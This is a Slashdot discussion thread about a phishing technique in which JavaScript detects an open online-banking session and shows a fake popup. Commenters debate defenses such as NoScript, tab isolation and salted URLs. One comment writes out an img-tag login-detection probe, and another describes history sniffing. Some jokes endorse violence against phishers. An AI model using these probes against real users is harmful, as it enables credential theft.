Phishing For Bank Info Without Any Pesky Malware

Emb3rz writes "DarkReading.com brings us news of a new approach to phishing that targets online banking sites. Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript from a remote page to detect if you have a banking site open, and prompts you for info via popup if you do."

The Best Defense is Offense

[alain94040]

This is real scary. And it goes to prove that bad guys always come up with new ways to steal. I don't believe there is a technical solution to this arms race.

Instead, I'd love to see our law enforcement friends be more pro-active and setup traps. Pose as a fake victim. Go out and seek those phishing sites. When the thieves come after your money thinking they just ripped off a stupid Internet newbie, then you can trace their activity and catch them.

That's the best way I can think of scaring the bad guys: when they never know if their next victim might be a cop.

--
FairSoftware.net -- work where geeks are their own boss

Re:The Best Defense is Offense

I've heard of something like this before.
Though there's this magical thing called noscript.
If people would stop putting law before them to prevent them from making stupid choices then we might have a more informed society.
(I ironically didn't read TFA.)

Re:The Best Defense is Offense

Unfortunately, the police can't do squat when the bad guy is operating out of Elbonia.

Re:The Best Defense is Offense

[X0563511]

The solution is to make the bad guys "disappear," not to seek out "justice."

Why the hell would Elbonia care if some local scumbags show up dead in a gutter somewhere?

Re:The Best Defense is Offense

[moderatorrater]

Police have boundaries and borders. The internet, alas, does not.

Re:The Best Defense is Offense

Because what is illegal here may not be in Elbonia and vice versa. What if posting a Youtube link is illegal in Elbonia and they send someone here to make the guilty "disappear"?

Re:The Best Defense is Offense

Of course we would then have to send someone to Elbonia to disappear the disappearers.

In fact we could lay traps for them by disappearing people in a country where that is illegal and then see who comes after them.

Re:The Best Defense is Offense

[eln]

Some of us like to believe that the Constitution, as well as all other laws and treaties the government operates under, restricts the government's actions everywhere that it operates, not just on American soil, and that it also precludes the government from encouraging other nations to do what it itself is prohibited from doing. I don't see how we can call ourselves a just nation if we simply outsource acts that we would find deplorable if our own government were carrying them out.

I don't deny that our government has had something of a bad history of clandestinely encouraging foreign powers to "disappear" people we find troublesome, but that doesn't make it right or legal, and it certainly doesn't mean we should encourage it to happen more often.

Re:The Best Defense is Offense

[blueg3]

Well, the nature of an arms race is such that it has technological approaches.

In this case, for example, there most certainly is a technological approach. JavaScript in one loaded tab in your browser should have no shared knowledge with other tabs in your browser. Data separation needs to be enforced at a finer level. You should also know, if you have two tabs open to different sites, which one of the two a popup is associated with.

Re:The Best Defense is Offense

[retech]

There's a simple technical solution to this:

1. trace the phishing to their location
2. send a missile to that location
3. problem solved

Re:The Best Defense is Offense

Is that what interpol is supposed to be doing but if I recall right they are doing alot of work on getting fans to stop downloading music why dont they arrest the real criminals :(

Re:The Best Defense is Offense

[calmofthestorm]

No but we can request that they be extradited or, failing that, tried there, for the crimes that are illegal in their own country.

Re:The Best Defense is Offense

[Dasher42]

I've got a question. Where did the parent say anything about "disappearing" anybody? Instead I thought that was a good approach to finding and prosecuting phishers of this variety.

Re:The Best Defense is Offense

[azenpunk]

you know, i used to wonder if a malware site could look across into another tab and look at what i was typing. guess i'm closing the browser and restarting a single tab to do banking stuff now.

Re:The Best Defense is Offense

[calmofthestorm]

Duh, it's where the American tubes are joined to the Elbonian tubes

Re:The Best Defense is Offense

[Gerzel]

Problem is with no-script you still have to decide if you trust or not-trust the site and if that level of trust you have is worth what the site is offering.

If the site offers a useful service which requires scripts you have to decide if it is worth the risk.

While in most cases it is easy to tell and block only those sites you trust. Those that you don't block may also allow third party scripts to be run such as in ads on the site.

Re:The Best Defense is Offense

[Gerzel]

Elbonia uses trenches as we cannot afford your extravagant tubes.

Re:The Best Defense is Offense

[Gerzel]

4. Find out that the phisers are using a proxy to bounce off of.
5. Find that proxy is some poor schmuck who got hacked.
6. Realize poor schmuck is you.
7. Boom.

Re:The Best Defense is Offense

[Gerzel]

There is no money coming to arrest real criminals.

Re:The Best Defense is Offense

There's a simple technical solution to this:
1. trace the phishing to their location
2. send a missile to that location
3. problem solved

Except that you'd end up bombing schools and hospitals, even if you get the tracing right, because that's where the phishers will move then. And their host country would probably declare war, and/or support more terrorists attacking Americans where ever...

Re:The Best Defense is Offense

Cnsitutions are laws of the state, so, as any other state law, just cover that state's territory, so your belief is quite wrong.

Also, all countries do have information services and agencies(CIA and NSA in the US, MI5 and MI6 in UK, DIS, AISE and AISI in Italy, and so on...And many others we don't even have knowledge of probably, like what Gladio was in Italy), just do do what they should or could not do if they just respected the laws.

Re:The Best Defense is Offense

Yeah, those Russian & Chinese guys are shaking in their chapkas about the FBI all right.

Re:The Best Defense is Offense

[ushering05401]

There's a simple technical solution to this:

      1. trace the phishing to their location
      2. send a missile to that location
      3. problem solved

I don't get it. Then the bad guys would have a missile. That is worse, not better.

Re:The Best Defense is Offense

[macraig]

This is precisely the sort of evolutionary cat-and-mouse game that is likely to lead to the first true artificial intelligence. It won't be some well-meaning altrustic researcher in some AI lab, it will evolve out of this cyber-warfare.

Re:The Best Defense is Offense

[ushering05401]

Is that what interpol is supposed to be doing but if I recall right they are doing alot of work on getting fans to stop downloading music why dont they arrest the real criminals :(

Interpol doesn't really work like that.

Each member country has an NCB (basically a central office) staffed by their own agents that can escalate issues through Interpol. So if Interpol is looking at piracy, then that started within a member nation's NCB, was escalated, and was deemed a valid cause by enough other member nations to become an agenda item. Furthermore, the only part Interpol would be interested in is assisting the actual enforcement officers in sharing information with other participating member nations, or facilitating training for participating members that do not have the resources to pursue a particular class of crime.

Interpol is an organization composed of 'Secretary General' types and special counsels. They only facilitate cooperation and are relatively poorly funded these days.

There is another organization known as the International Police that are actually police who arrest people, but they only operate in areas without the capability to raise a police force (ie: war torn countries).

Re:The Best Defense is Offense

[rolfwind]

No idiot. The Constitutions defines the US Government and therein always binds the US Government when it acts, no matter what, where, or when. At least that's the theory.

Just because the government is acting outside of state boundaries, doesn't give it the means to do whatever the hell it pleases.

Re:The Best Defense is Offense

[thetartanavenger]

NoScript breaks my online banking. Yeah it's a good idea and I tried to use it for a while, but I found that no matter what exceptions I gave it when it came to my bank, it refused to allow me access. Don't know why, but it kinda kills your argument if you have to turn NoScript off completely to use your online banking.

Re:The Best Defense is Offense

[DigitAl56K]

Problem is with no-script you still have to decide if you trust or not-trust the site and if that level of trust you have is worth what the site is offering.

That slightly over-simplifies the protection that NoScript offers. For example, even when you allow script to run NoScript still provides protection against certain types of XSS, you can use it to force cookies to be exchanged over https for certain domains, it can block some plug-in types (Java, Flash, Silverlight), it features click-jacking protection, and just a couple of days ago it even added protection against attacks on twitter.

So yes, you do have to make that trade-off, but even when you click "allow" you're potentially better off with NoScript installed than without it.

Re:The Best Defense is Offense

[ZygnuX]

I don't know if your post deserves +1 Funny, +1 Interesting, +1 Insightful or what...

But you really deserve some modding up!

Re:The Best Defense is Offense

[Cigarra]

Police have boundaries and borders. The internet, alas, does not.

Well that's correct... for a while. As in any "new territory", there's a time for anarchy and (maybe) chaos, free-for-all and stuff. During that period, it's jungle law. Lots of wounded, and a few winners.

Then of course comes the Reaction, and the Usual Powers settle in. This book explains it pretty well.

Re:The Best Defense is Offense

[locofungus]

This is real scary. And it goes to prove that bad guys always come up with new ways to steal. I don't believe there is a technical solution to this arms race.

A good start would be for banking sites to work with Javascript turned off, and, maybe, even suggest you turn off Javascript while using online banking.

Requiring you to turn it _ON_ is insane, but extremely common.

Tim.

Re:The Best Defense is Offense

[N1AK]

Slashdot: Where fining people for copyright infringement is wrong but killing people for stealing login details is "Insightful".

Re:The Best Defense is Offense

[LingNoi]

Those damn lefties!

Simple solution, take the job as an Elbonian diplomat and then do what you want!

Re:The Best Defense is Offense

[garett_spencley]

AFAIK tabs are really just windows. The difference is how they're displayed by the GUI. But from a Javascript POV the tab is just another window. So if we start limiting the knowledge that javascript has over other windows then we prevent a lot of useful, legitimate things that can be done with other windows. For example: I have a few web-apps that use pop-up windows in a non-annoying way (ie: you click something to open the window that actually performs a useful task).

At first glance I like the idea of preventing cross-domain knowledge, but then you still run into problems across same-site domains like static.yourdomain.com and script.yourdomain.com etc.

I think the best defense against this attack is to use a separate browser session for banking. Banks should educate their users about this type of attack and make it very clear that they should close their browser and open up a new one, with no other sites open, just for their banking.

Re:The Best Defense is Offense

[gadget+junkie]

[...]While in most cases it is easy to tell and block only those sites you trust. Those that you don't block may also allow third party scripts to be run such as in ads on the site.

as far as I know, from using noscript on firefox, I can enable java on my bank's page and it still blocks Ads and java scripts if they come from other sources. from noscript home:"The NoScript Firefox extension provides extra protection for Firefox, Flock, Seamonkey and other mozilla-based browsers: this free, open source add-on allows JavaScript, Java, Flash and other plugins to be executed only by trusted web sites of your choice (e.g. your online bank), and provides the most powerful Anti-XSS protection available in a browser. "

Re:The Best Defense is Offense

[RonTheHurler]

How about this one-

I got a letter in the mail (usps snailmail) from Bank of America asking for a lot of personal information that was missing from my account, and that if I didn't supply that information they'd have to report me to the IRS.

The letter was spelled correctly, had proper grammar and even had the BofA logo printed in full color. The return address was a PO box in Dallas. Nothing fishy at all.

Problem is, I don't have a BofA account. But I'm sure a LOT of other people do.

Phishing - it's not just an on-line phenomenon.

Re:The Best Defense is Offense

[Goaway]

Well, I guess if you do that enough times, you've solved the botnet problem.

Do you have enough missiles, though?

Re:The Best Defense is Offense

"Instead, I'd love to see our law enforcement friends be more pro-active and setup traps. Pose as a fake victim. Go out and seek those phishing sites. When the thieves come after your money thinking they just ripped off a stupid Internet newbie, then you can trace their activity and catch them."

That would be nice. IF the cretins were in the U.S.

U.S. jurisdiction stops at it's borders.

Re:The Best Defense is Offense

[aeroswift]

Sounds nice and simple in theory, but is it? If tracing was that simple, this article probably wouldn't exist.

Or maybe I'm overestimating the bad guys.

Re:The Best Defense is Offense

The police aren't going to be able to do a thing due to the sheer numbers of victims.

Reason?

You. Can't. Fix. Stupid.

Re:The Best Defense is Offense

[indi0144]

Call your bank! tell em you're going to the media as in "halp-my-buntu-box-does-not-do-word" unless they fix that. Happened here on my bank, they required IE 7 and I (and other fellow local geeks) called and emailed them so now they support Opera and Firefox.

Re:The Best Defense is Offense

[Muad'Dave]

Maybe "you" do, and you don't know it. I think it would be prudent to call BoA, tell them what you received, and make sure someone isn't laundering money using an account opened with your SSN, name, or address.

Re:The Best Defense is Offense

[redxxx]

Why the hell would Elbonia care if some local scumbags show up dead in a gutter somewhere?

Then they won't get any Baksheesh from the local businessmen.

Re:The Best Defense is Offense

You can.. the UN does not give a fucking heck if You do it. Neither the rest of the world.

Re:The Best Defense is Offense

[blueg3]

When you're currently visiting one site, and open a new tab and go to a different site, those two open tabs should have no capacity to share information -- they should function as if they were separate browser sessions. (Obviously this isn't the same as if you clicked on something in a tab that causes another tab or window to open, as they may need to share knowledge. But then, the fact that those two tabs/windows are tied to the same context should be made apparent to the user.)

Re:The Best Defense is Offense

The browser Galeon could be set to force ALL pop-ups to appear as new tabs instead of in new windows. That way, there is always a URL associated with the content (and they can't take over your screen).

Re:The Best Defense is Offense

I've lost all faith in Interpol since they helped to stage the "reyes-laptop-gate" the only consumer grade toshiba laptop that can stand a 500 lb bomb explosion unscratched.

http://www.borev.net/2008/03/raul_reyes_amazing_laptop_of_m.html

Re:The Best Defense is Offense

[The+Moof]

NoScript offers per-domain blocking. If you're bank's website is the one serving the malicious scripts, something tells me NoScript isn't going to stop the attackers from stealing your information...

Re:The Best Defense is Offense

[hesaigo999ca]

Well we are those fake victims to them, the banks use us as bait, and we let them (as if we could bring them to court to not allow this, we would have to prove they do this, and then provide an alternative that way we show their is an option) anyways, the banks never really want to use
an account of theirs for that, because they dont have to,where as you have to use yours to access your online banking, and the chances that you are stung is 1 in 1000 (about)...so they wait for that 1 in 1000, then they wait to see if you notice that extra 1.25 charge, then if you do, they reimburse you, and it ends there (although they log the call), and if enough of the same type of call is being logged, then they get the expert to take a look, and they find a new attack vector, or new scam.

It is very sad, as I have friends in the banking business, and they all say that accountability ends up last on the list, budget being the first.

Re:The Best Defense is Offense

[hesaigo999ca]

Irony of online banking is most don't work without javascript enabled.

Re:The Best Defense is Offense

[Kindaian]

Yes, but you aren't plaged by css... ;)

Re:The Best Defense is Offense

[RonTheHurler]

Yes, that's a possibility, but my SSN was exactly what was being asked for, along with birthday and some other stuff. Your name and address are easily available to just about anyone. Most of us who own property have our names, addresses and other "private" information on-line on county web sites, available to anyone who wants to search them.

I run a small business, and it's amazing how many of my customers have been able to look-up my home address, home phone number and such using public tax record, real estate and utility company data.

It's no wonder that identity theft is such an easy crime. Keeping your SSN private is like having a password that you can never change. Security by obscurity, but for your life and your financial reputation.

Phishing is only one point of vulnerability. I fear this problem is only going to get worse until we find a better way. Who's working on this anyway?

Re:The Best Defense is Offense

[Kindaian]

If noScript breaked your online banking, then prolly your bank needs a new site! ;)

Re:The Best Defense is Offense

[nabsltd]

Then, there's the Citibank credit card site, which doesn't work with Firefox if scripting is enabled, but gives full functionality (although without drop-down menus, etc.) if scripting is disabled.

On the other hand, that site works fine with IE with scripting enabled.

Re:The Best Defense is Offense

[oliderid]

Well, sorry to be so ignorant but How does the hacker place his piece of HTML code into the HTML code of the bank web site?

As far as I know :

• there is no way you can access the content or location of another tab.
• There is no way your javascript could access another page it didn't create or isn't part of.

Re:The Best Defense is Offense

[SBrach]

Your the first person I have seen use "fuck" and "heck" in the same sentance.

Re:The Best Defense is Offense

Agreed. It should be "Informative". Obviously.

Re:The Best Defense is Offense

[charlesj68]

I think it would be prudent to call BoA, tell them what you received, and make sure someone isn't laundering money using an account opened with your SSN, name, or address.

Or, failing that, at least turn it over to a Postal Inspector.

Re:The Best Defense is Offense

There's a reason that the feds require credit reporting companies to give you a free report every year.

Re:The Best Defense is Offense

[severoon]

I read about a law enforcement organization that tried to do exactly what you're suggesting. They got taken for hundreds of thousands of dollars.

Re:The Best Defense is Offense

[dotgain]

But who will disappear the disappearers who disappear the disappearers?

If disappearing is outlawed, only outlaws will disappear.

Re:The Best Defense is Offense

And that is annualcreditreport.com not freecreditreport.com which is not free

Re:The Best Defense is Offense

[Muad'Dave]

Very good point, I forgot that snail mail has people who take fraud via their medium quite seriously. I wish that were the case universally *cough*Internet*cough* *cough*Telephone*cough*.

Re:The Best Defense is Offense

[indian_rediff]

I can attest to this. I have received a similar snail mail letter from First Union. I had opened an account many moons ago - when they were still called First Fidelity. I changed my bank for unrelated reasons and closed my account, my overdraft account, my business' account and my safe deposit account. All fine.

Suddenly they decided to charge me fees for the overdraft account - about 8 years after I had closed it.

I called them and they found that internally, they had just moved their data from an old system to a new system.

Initially I was absolutely petrified that someone had stolen my identity. Fortunately, the phone call proved that my concerns, although valid, were unnecessary.

The reason for the problem was that the integration of First Fidelity's accounts into the new system.

I would hazard that something similar may have happened - some bank acquired by BofA had data that got onto the new BofA system and triggered the alert.

Re:The Best Defense is Offense

[slash.duncan]

The problem is likely that the banking site is on one domain, say online.bankofjoe.com, but running a script from another, say scripts.bankofjoe.com. Then there's cookies that may be bankofjoe.com or online.bankofjoe.com, and if it's the former, they may be set by a third domain, login.bankofjoe.com or the like.

The trick with cookie/script/java/plugin permissions is to figure out exactly which domains need permission to run or deliver their cookie or whatever, and allow it for them, without simply turning on allow all. With scripting at least, there's another extention that helps in this regard, JSView, intended to allow listing and viewing of all external CSS and scripts. The listing is key, here, as it allows one to see exactly where they all come from, and (tho it probably doesn't apply to banking) then tell noscript to allow the appropriate domains one wants, without allowing that script from adtracker.com or whatever.

One more troubleshooting trick that helps is to turn off auto-forwarding. It's quite common for bank and other "personal info" (tax, insurance, etc.) sites to forward you from one domain to another (login, onlineid, the main online site, billpay, etc), thru several domains in a single session. Some of those (say onlineid, above) may be immediately forwarded thru, so you don't actually see them in the address bar and know to unblock them unless you turn off auto-forwarding. That way, the click from login that takes you thru onlineid to the main site, stops at onlineid, giving you a chance to say "Oh, /that's/ the one I need to unblock. This was what did the trick at a tax site I was using a few years ago, with konqueror. I could get it working with mozilla (I think it was mozilla now seamonkey, not firefox, as I think it was before firefox), but not konqueror, unless I turned scripting on for everything in konqueror. After I disabled auto-forwarding, I ended up at an intermediate domain that I didn't know anything about until then. After I added appropriate permissions for it, everything "just worked".

Re:The Best Defense is Offense

[plantman-the-womb-st]

I've got a question. Where did the parent say anything about "disappearing" anybody?

The solution is to make the bad guys "disappear," not to seek out "justice." Why the hell would Elbonia care if some local scumbags show up dead in a gutter somewhere?

Um, right there? You know, the ENTIRE post?

Re:The Best Defense is Offense

[ushering05401]

I had never read about that. Interesting link.

Re:The Best Defense is Offense

*lock & load*

You sure?

Re:The Best Defense is Offense

Loose Change.

Re:The Best Defense is Offense

[galego]

Exactly, the browser's history is not protected per tab, but is globally accessible by all tabs (and their js) AFAIK. The browser-maker has to figure out how to balance the security of the tab versus the convenience of a global history for the user. As I understand it, the only piece of info needed here is your history ... nothing from your banking site tab itself. So ... it's a question of whether or not the history can be "stove-piped" and protected as tab information as far as js is concerned.

For that matter though ... I'd be fine with banning js from having access to browser history at all. I don't think the trade-off is worth it in the end. Would break a lot of stuff out there I'm sure (well ... none of my stuff).

Re:The Best Defense is Offense

[blueg3]

I suppose browser history would work, too. The attack described here actually uses a login test. The attacker's website includes a piece of JavaScript that routinely tries to access a page (or other Web-accessible item) that requires you to be logged in to the particular banking site to access. (Say, for example https://my.bank.com/account_summary.html.) It tests for failure/success and, if successful, pops up a dialog.

Beyond the fact that user should be able to tell, visually, what page the dialog is associated with, random-attacker's page shouldn't be able to access content on your bank as if you were logged in. It should have no way of knowing what the rest of your browser is doing. Noticing the bank in your history would be one way of seeing that you are or recently were logged in. In this case, the login test described works because session cookies, used to track a login session, are global in the browser. While the attacker can't easily access the cookie itself, it can (as described) test to see if it exists and is valid. With an ideal design, random-attacker's page would not only not have access to the cookie, but not have access to the *side effects* of having the cookie.

XSS

[AKAImBatman]

Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love.

A cross-site scripting attack sounds like a pretty typical attack vector to me. Javascript should not be able to "detect" if they have a banking site open. Pure and simple.

Re:XSS

[AKAImBatman]

BTW, for those of you who are curious about this attack (and are too lazy to RTFA), this basically uses a common image set behind a protected login. e.g.

<img src="https://www.mybank.com/protected/images/lock.gif" onerror="notLoggedInSoRefresh();" onload="hahaGotEm();">

If you ping the blasted thing for long enough, you will be able to detect the user logging in. One pop-up later and you've stolen their info.

Now protecting against this sort of issue is an interesting question. Ideally static resources should never be behind closed doors. But that answer is a bit of a cop-out. The next best thing is to ensure that session cookies are maintained inside the login tab ONLY and that persistent cookies are not used for auto-login.

(Interesting question: I wonder if Chrome is vulnerable? With process isolation, this trick would require that the main Chrome process delegate the handling of session cookies. Which seems like a bad idea anyway, so I would hope they implemented the browser in a more secure manner.)

Re:XSS

[camperdave]

Wouldn't this mean they'd have to ping every bank? If I bank at www.otherbank.com, loading anything from www.mybank.com isn't going to get them very far. Now, if they sniffed my temp folder for lock.gif or other footprints... that might work.

Re:XSS

[Culture20]

It doesn't take them any more time to "ping" the top 20 banks than it would just one. It's all done by your browser on your machine in response to a web page. It's just the difference of 20 img tags or just 1.

Re:XSS

[Animaether]

so wait..
as you explain it, I guess the idea is that once the user logs into the secure site, the malware script can magically access the lock.gif because the site and browser tell them that.. yup.. the user is logged in and thus should have access.

however.. presumably, the script is not from a page that's actually -on- https://www.mybank.com/.. if it was, you and the bank probably have bigger problems.

So let's say that instead it's on http://www.malware.lol/ - why would a script on a page from malware.lol be allowed access to a resource - in this case 'pinging' the 'lock.gif' - *on* https://www.mybank.com/ ?

Is there any valid purpose for allowing something like that? I can understand it for non-secure sites.. from inlining content that's hosted on another domain to allowing local applications to grab data off of e.g. websites that do not provide a nice API. But for secure sites? I'm baffled.

Re:XSS

[AKAImBatman]

So let's say that instead it's on http://www.malware.lol/ - why would a script on a page from malware.lol be allowed access to a resource - in this case 'pinging' the 'lock.gif' - *on* https://www.mybank.com/ ?

There's a great deal of internet history behind this one. Originally, there were no barriers what so ever. Anyone could link anything from any page. Of course, as Javascript entered the scene and grew in sophistication, this was soon realized to be a problem. In result, most browsers adopted security behaviors for the really powerful stuff like XMLHttpRequest and locked out scripting across frames.

However, that still leaves a hole like this one. And it's not an easy hole to plug. Quite a few sites are actually structured around the idea of cross-site linking. (e.g. The HTML may be www.mainsite.com while the images come from the web server media.mainsite.com.) Interestingly, this sort of structure is actually a solution to the problem posed. So it's difficult to dispose of it out of hand.

Some of the web standards are moving toward highly restrictive models for HTTPS sites. e.g. HTTPS resources can only be accessed by pages whose origin is the same HTTPS site. More likely though, I expect to see more explicit security configurations along the lines of what Flash does. Flash uses a crossdomain.xml file on the target site to broadcast if a resource can be accessed or not. This scheme allows for situations like a media server separate from the primary site, but it also allows for those cross domain accesses to be tightly restricted.

Of course, the scheme is not without its problems. Nothing prevents an attacker from transmitting information he may have collected TO a server that he has configured with a permissive policy file. If he finds a vulnerability that allows him to collect the information in the first place, he's going to be able to make off with the info scott-free.

In result, web security is an ongoing area of research. It's incredibly complex due to the nature and history of the web, but standards bodies are working hard to find more reliable solutions that don't negatively impact existing sites and current usage.

Re:XSS

[RockMFR]

There is nothing special about secure sites. HTTPS doesn't mean "this site is super special and you should do special things with it". This same attack can be applied to non-secure sites, too.

Re:XSS

[FalleStar]

Looking for protected images is one of the ways that can be used to determine if the user is viewing the website; however there is another way apparently.

As you can see IE, Firefox, Safari & Chrome are all included on the vulnerable list.

NoScript will (as usual) keep you protected however.

Re:XSS

[hairyfeet]

And that one is JavaScript too. Has anyone else noticed that pretty much every piece of nasty coming down the pipe uses JavaScript? I've said it before and I'll say it again: JavaScript is a BAD Idea, just as ActiveX was a bad idea. They both are havens for malware. The only difference is ActiveX was Windows only. But in either case it is still a giant security hole. If this keeps up and enough folks are burned I could see it dying off just as ActiveX did.

Now as for Noscript, while I use it every day it just isn't friendly for 99.999% of home users. What we need is a "simple" option setting for Noscript, perhaps set up by allowing the user to choose on first install, which instead of listing every single blockable element, would have a "play video" button which would look for *.flv, *.mp4, etc and play the video. Because it is video sites that have made Noscript useless for handing out to non techies. I have watched my customers and they quickly get frustrated because they can't figure out which of the dozen blocked elements is the video they want to see and soon start clicking "allow all on this page" which makes it as useless as Vista's UAC prompts. By having a "play video" option at the bottom you would still have the high security, since nothing is being run by default, but it would allow the non techs to play their videos without killing the security.

Re:XSS

[kingcobra0128]

yeah that sounds about right :)

Re:XSS

This has nothing to do with XSS. RTFA.

Re:XSS

The defense is much simpler than changing the cookie model: Just give all resources which are only available after login a "salted" URL. So name the image "https://bank/image.jpg?salt=5937853240596428465135542" for that particular user and make it so that only salted URLs are dependent on log-in. The other page can't guess the salt, so it can't try to load the image to see if the user is logged in.

Yes, this does break caching, but there are only two sensible options here: Either the availability of the image depends on a log-in, then it shouldn't be cached in the first place, or the availability does not depend on the log-in, then you shouldn't use salted URLs and the image should be available whether the user is logged in or not.

Re:XSS

This is complete cobblers.

Linking of images on one site to display on another has nothing to do with cross-site scripting.
The lock.gif image will still exist on the server whether you're logged in or not.

Re:XSS

The script doesn't access the image, it just gets the information that loading the image succeeded or resulted in an error. Third party images are a very common thing on the web. You may be able to find an option in your browser for disabling third party content (everything not coming from within the same domain/path as the HTML document holding it all together), but if you turn off third party content, many pages will stop working or miss lots of pictures (on the plus side, you won't be seeing many ads either).

A naive approach would be to limit the events fired by the image (onerror and onload) to scripts which have the same origin as the image. That wouldn't stop the attack though, because images influence the layout: The script could test if the image has loaded by looking at pixel distances on the page. A similar attack can be used to see if you have visited a particular page within the time that your browsing history covers (usually 7-14 days). To do that, a script can look at the color of a link. If it's the color of visited links, you've been there. This attack does not load anything from the server, so it would be a useful pre-test to see if you actually use online banking and at which bank. Then the image loading detection routine only needs to be performed for that bank.

In essence, if you do anything that you have to log in for, turn off your browsing history and browse like it's 1994: One page at a time, no tabs.

Re:XSS

[datadigger]

The lock.gif image will still exist on the server whether you're logged in or not.

It's not about whether or not the image (or any other element, it doesn't have to be an image) exists, but rather if the request for it will be honoured by the bank server.

This scheme works for any request that is answered only when the user is logged in.

Re:XSS

[Goaway]

Has anyone else noticed that pretty much every piece of nasty coming down the pipe uses JavaScript?

No, we haven't, because we don't have your confirmation bias.

Re:XSS

[Animaether]

"There is nothing special about secure sites. HTTPS doesn't mean "this site is super special and you should do special things with it". This same attack can be applied to non-secure sites, too." - RockMFR (1022315)

Well that's the thing - why not? They are superspecial to my browser already.. doing its certificate check and throwing a big fat "passport check" image at me (FireFox 3) if it think something's not quite up to snuff. I don't see why a page on anything other than https://www.mybank.com/ shouldn't be told to piss off.

"Quite a few sites are actually structured around the idea of cross-site linking. (e.g. The HTML may be www.mainsite.com while the images come from the web server media.mainsite.com.)" - AKAImBatman (238306)

That I understand - as per my post, for inlining things etc.

However, I think that in the specific case you mentioned - e.g. media.. presumably images - those images *should* either come from the same domain as the secure site *or* come directly from an insecure site. Yes, a browser will pop up a warning that there's mixed content.. it does that for a reason, I would think. But the way around that is not to stick your images on a completely different-but-still-secure domain (I've not actually seen this, so for all I know that throws up an error as well anyway), but by keeping things on the same domain. Any sysadmin worth their pay can easily offload resources to a different media server if there's some manner of capacity issue at play that would have them put the media on a different domain otherwise.

Maybe making things more strict would indeed break a few sites, but other than webmasters/sysadmins realizing they need to be more careful, I don't see the harm in that other than short-term mumbling and cursing from the aforementioned groups.

crossdomain directives sound like another security problem just waiting to happen, in my humble opinion, but I'm certainly not an expert on that topic.

Re:XSS

[the_one(2)]

Maybe the bank should be secure so that all attacks fail? It's isn't rocket science... (yes it isn't easy either but it has been solved)

Re:XSS

[Emb3rz]

The PDF that is linked to in TFA states explicitly that this does not involve the use of 'protected' resources to determine if you are logged in or not. This is, in fact, a different vulnerability exposed by JavaScript.

Link for the lazy: http://www.trusteer.com/files/In-session-phishing-advisory-2.pdf, page 2 paragraphs 3 and 4.

Re:XSS

[horatio]

Has anyone else noticed that pretty much every piece of nasty coming down the pipe uses JavaScript?

No, we haven't, because we don't have your confirmation bias.

Exactly. Has anyone else noticed that pretty much every DUI coming down the road uses a car? A hammer used to pound in nails, or pound someone in the head. Javascript is a tool like any other. Doesn't mean we're running around figuring cars and hammers are a bad idea because they're abused in a few cases by stupid/bad people. Should we find better ways to secure abuse of JS? Sure, I have no problem with that.

ActiveX is another issue. The browser was SUPPOSED to be platform independent. ActiveX, like so much other BS coming out of Redmond, broke that. While it could be argued that flash support lags behind for *nix platforms - Flash isn't bundled with the browser, by the people who make the browser, who push PHBs to make their devs build ActiveX controls instead of real sites. AFAIK, there is no ActiveX for anything *except* windows machines - unlike Java, Flash, Javascript, etc.

Now, given that, the one ActiveX control I've seen that I do like, and *do* understand is one on HP's site for installing printer drivers. It makes sense in that situation - but it isn't required for the HP site to function - there are several other vectors to obtain drivers.

Re:XSS

[wiredlogic]

Thank god PayPai is designed not to use persistent cookies for authentication.

Re:XSS

[hairyfeet]

So, in other words ActiveX would have been fine if it would have been platform independent, since "A hammer used to pound in nails, or pound someone in the head. Javascript is a tool like any other. Doesn't mean we're running around figuring cars and hammers are a bad idea because they're abused in a few cases by stupid/bad people." Right?

While I agree with you that JavaScript is a tool just like any other, in its current implementation I think it is a BAD tool. The problem isn't the code itself, it is the fact that most sites are loading it from a third party that they have NO control over. So even if you write the most secure site known to man, where God himself blesses your code with righteous security FU, if the site that serves the web ads that pays your bills hands you a malicious JavaScript your users are boned. That is BAD. We should not be running code from third parties. I might trust you, and might have done business with you in the past. But with third party JavaScript your security is only as good as whatever ad agency buys space off of you this week. And that is....well bad.

We should either go back to ads being static, or JavaScript should be completely sandboxed and scanned BEFORE it is run. At the very least we should be trying to have a dialog between security researchers and those that support JavaScript to try to find safer ways to implement it. But what we have now where all the browsers are in a pissing contest to see who can render JavaScript faster is frankly a recipe for disaster. What we need is more security IMHO, not more speed. I am sure if you ask most folks out there they'd be happy to give up three seconds if they were given a safe browsing experience in return. But at the very least with "JavaScript exploit o' the day" seeming to be an everyday occurrence shouldn't we be at least having a more public debate on how to secure it?

Re:XSS

[jspraul]

Http Referer checking sounds like a "works for most" solution.

Simple Solution...

[Klootzak]

Don't have multiple tabs/windows open while you're doing your online banking!!!

Oh, and use NoScript!

Re:Simple Solution...

[Bozzio]

This, like most phishing attempts, targets users who don't know about NoScript or basic internet safety practices.

Yelling "Install NoScript you n00bs!!1!" won't register noobs... because they're newbs.

Re:Simple Solution...

[X0563511]

Once more, Darwin extends into the internet.

Computers are tools. They do what they are told without question. The internet is made of computers. By extension, it is a tool that does exactly what it is told.

Kind of like a handgun, and you don't (usually) let people run around with those without some kind of training.

Also like a handgun, most tools don't care who is issuing the instructions - they just do it. That tablesaw doesn't care if it's a 2x4 or your forearm, it saws anyways.

Yes, I'm an elitist bastard sometimes.

Re:Simple Solution...

[Klootzak]

Yelling "Install NoScript you n00bs!!!" won't register noobs... because they're newbs.

Well, I wouldn't call them n00bs firstly... and secondly, most of the technically-savvy geeks/nerds I know read Slashdot and find out new and interesting stuff from here.

One of the best things about Slashdot is if you write something on here, ALOT of people will take notice. So if by providing solutions/information that people can read and take away to tell other non-technically-savvy individuals helps protect at least one person from being scammed, I'm more than happy to yell on Slashdot about it ;)

Re:Simple Solution...

[Spacejock]

I second that. I've been using noscript for years, and wouldn't browse the net without it.

Re:Simple Solution...

This, like most phishing attempts, targets users who don't know about NoScript or basic internet safety practices.

Yelling "Install NoScript you n00bs!!1!" won't register noobs... because they're newbs.

You're onto something, but I'd like to kill the problem at its source: The fuckwit marketroid goons who demand the use of Javashit on the fucking login page in the first place.

(I'm not a fundamentalist about this. There may be legitimate reasons why you might want to use Javashit, served via https, to customers who are already logged into a banking website. But there is no legitimate reason to use Javashit on a login page.)

Sorry if I come across as bitter. I remember the first fucking time that Bank of America switched to the "new and improved" login page. I saw so many flashes to "www.liveperson.com" that I thought the box had been compromised.

